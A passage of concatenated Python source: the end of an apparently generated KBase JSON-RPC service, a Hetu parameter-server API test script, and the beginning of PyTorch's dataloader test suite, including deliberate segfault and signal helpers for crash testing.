self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_variation'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_variation.run_kb_variation,
name='kb_variation.run_kb_variation',
types=[dict])
self.method_authentication['kb_variation.run_kb_variation'] = 'required' # noqa
self.rpc_service.add(impl_kb_variation.status,
name='kb_variation.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_variation ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_apis.py
|
import hetu as ht
import time
import os
import sys
import yaml
import multiprocessing
from multiprocessing.sharedctypes import RawArray as rarr
import argparse
import signal
import numpy as np
from scipy.stats import truncnorm
import ctypes
import matplotlib.pyplot as plt
nitem = 2000
item_len = 1000
indx1 = 30
indx2 = 40
def test_init_ps(rarr, init_type, init_a, init_b=1.0, sparse=False):
assert init_type in ('constant', 'uniform', 'normal', 'truncated_normal')
init_type_map = {'constant': 0, 'uniform': 1,
'normal': 2, 'truncated_normal': 3}
ctx = ht.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
local_arr = np.frombuffer(rarr, dtype=np.float32).reshape(nitem, item_len)
if rank == 0:
arr = ht.array(local_arr, ctx=ctx)
else:
arr = ht.empty((nitem, item_len), ctx=ctx)
comm = ht.get_worker_communicate()
if sparse:
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
itype = ctypes.c_int(init_type_map[init_type])
comm.InitTensor(ctypes.c_int(0), ctypes.c_int(sparse), arr_len, arr_wid, itype, ctypes.c_double(
init_a), ctypes.c_double(init_b), ctypes.c_ulonglong(123), ctypes.c_int(0), (ctypes.c_float * 1)(0.1), ctypes.c_int(1))
comm.Pull(ctypes.c_int(0), arr.handle)
comm.Wait(ctypes.c_int(0))
if rank == 0:
local_arr[:] = arr.asnumpy()
comm.BarrierWorker()
if rank != 0:
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
else:
if init_type == 'constant':
np.testing.assert_allclose(
np.full((nitem, item_len), init_a), arr.asnumpy(), rtol=5e-7)
else:
if init_type == 'uniform':
numpy_samples = np.random.uniform(
low=init_a, high=init_b, size=(nitem, item_len)).astype(np.float32)
elif init_type == 'normal':
numpy_samples = np.random.normal(
loc=init_a, scale=init_b, size=(nitem, item_len)).astype(np.float32)
else:
numpy_samples = truncnorm.rvs(-2.0, 2.0, loc=init_a,
scale=init_b, size=(nitem, item_len)).astype(np.float32)
fig, ax = plt.subplots(1, 1)
ax.hist(numpy_samples.flatten(), histtype='stepfilled',
alpha=0.2, bins=50, label='numpy')
ax.hist(local_arr.flatten(), histtype='step',
alpha=0.2, bins=50, label='ps')
ax.legend(loc='best', frameon=False)
# ax2.legend(loc='best', frameon=False)
file_name = '%s_%.1f_%.1f_%d.png' % (
init_type, init_a, init_b, int(sparse))
plt.savefig(file_name)
print('Check file %s.' % file_name)
print('Init parameters %d/%d passed.' % (rank, nrank))
if rank == 0:
comm.ClearOnServer(0)
comm.Clear(0)
comm.BarrierWorker()
def test_api(rarr, rpush, rpull, sparse=False, lr=0.5):
ctx = ht.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
local_arr = np.frombuffer(rarr, dtype=np.float32).reshape(
nitem, item_len).copy()
local_push = np.frombuffer(rpush, dtype=np.float32).copy()
local_pull = np.frombuffer(rpull, dtype=np.float32).copy()
if rank == 0:
arr = ht.array(local_arr, ctx=ctx)
else:
arr = ht.empty((nitem, item_len), ctx=ctx)
comm = ht.get_worker_communicate()
if sparse:
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
comm.InitTensor(ctypes.c_int(0), ctypes.c_int(sparse), arr_len, arr_wid, ctypes.c_int(0), ctypes.c_double(0.0), ctypes.c_double(1.0), ctypes.c_ulonglong(123),
ctypes.c_int(0), (ctypes.c_float * 1)(lr), ctypes.c_int(1))
if sparse:
local_arr[:] = 0
for j in local_push:
local_arr[int(j)] += 1
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SparsePush(0, push_ind.handle, push_val.handle, None)
comm.Wait(0)
comm.BarrierWorker()
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('SparsePush DensePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
for j in local_push:
local_arr[int(j)] += 1
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SDPushPull(0, push_ind.handle,
push_val.handle, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('SDPushPull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
for j in local_push:
local_arr[int(j)] += 1
pull_ind = ht.array(local_pull.reshape(indx1, indx2), ctx=ctx)
pull_val = ht.empty((indx1, indx2, item_len), ctx=ctx)
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SSPushPull(0, push_ind.handle, push_val.handle,
pull_ind.handle, pull_val.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.SparsePull(0, pull_ind.handle, pull_val.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr[local_pull.astype(int)].reshape(
indx1, indx2, item_len), pull_val.asnumpy(), rtol=5e-7)
print('SSPushPull and SparsePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
else:
if rank == 0:
comm.Push(0, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('DensePush DensePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
if rank == 0:
temp_push_val = ht.array(
np.ones((nitem, item_len)).astype(np.float32), ctx=ctx)
comm.DDPushPull(0, temp_push_val.handle, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr + 1, arr.asnumpy())
print('DenseDensePushPull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
if rank == 0:
comm.ClearOnServer(0)
comm.Clear(0)
comm.BarrierWorker()
def start_process(settings, args, arr=None, push_arr=None, pull_arr=None):
for key, value in settings.items():
os.environ[key] = str(value)
if os.environ['DMLC_ROLE'] == "server":
ht.server_init()
ht.server_finish()
elif os.environ['DMLC_ROLE'] == "worker":
ht.worker_init()
test_api(arr, push_arr, pull_arr)
test_init_ps(arr, 'constant', 1234.567)
test_init_ps(arr, 'uniform', -0.5, 0.4)
test_init_ps(arr, 'normal', 5.6, 2.0)
test_init_ps(arr, 'truncated_normal', -2.3, 1.4)
test_api(arr, push_arr, pull_arr, True)
test_init_ps(arr, 'constant', 1234.567, True)
test_init_ps(arr, 'uniform', -0.5, 0.4, True)
test_init_ps(arr, 'normal', 5.6, 2.0, True)
test_init_ps(arr, 'truncated_normal', -2.3, 1.4, True)
ht.worker_finish()
elif os.environ['DMLC_ROLE'] == "scheduler":
ht.scheduler_init()
ht.scheduler_finish()
else:
raise ValueError("Unknown role", os.environ['DMLC_ROLE'])
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in process_list:
proc.kill()
exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='./local_s2_w2.yml')
args = parser.parse_args()
settings = yaml.load(open(args.config).read(), Loader=yaml.FullLoader)
process_list = []
arr = rarr('f', np.random.rand(nitem * item_len,).astype(np.float32))
push_arr = rarr('f', np.random.randint(
0, nitem, (indx1 * indx2)).astype(np.float32))
pull_arr = rarr('f', np.random.randint(
0, nitem, (indx1 * indx2)).astype(np.float32))
for key, value in settings.items():
if key != 'shared':
if key[0] != 'w':
proc = multiprocessing.Process(
target=start_process, args=[value, args])
else:
proc = multiprocessing.Process(target=start_process, args=[
value, args, arr, push_arr, pull_arr])
process_list.append(proc)
proc.start()
signal.signal(signal.SIGINT, signal_handler)
for proc in process_list:
proc.join()
|
test_dataloader.py
|
# Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminiates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start method is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for a inter-process communication can be highly varying. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
# Setting disable_stderr=True may generate a lot of unrelated error outputs
# but could be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't finds alive proc
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
# Inspired by https://stackoverflow.com/a/26703365
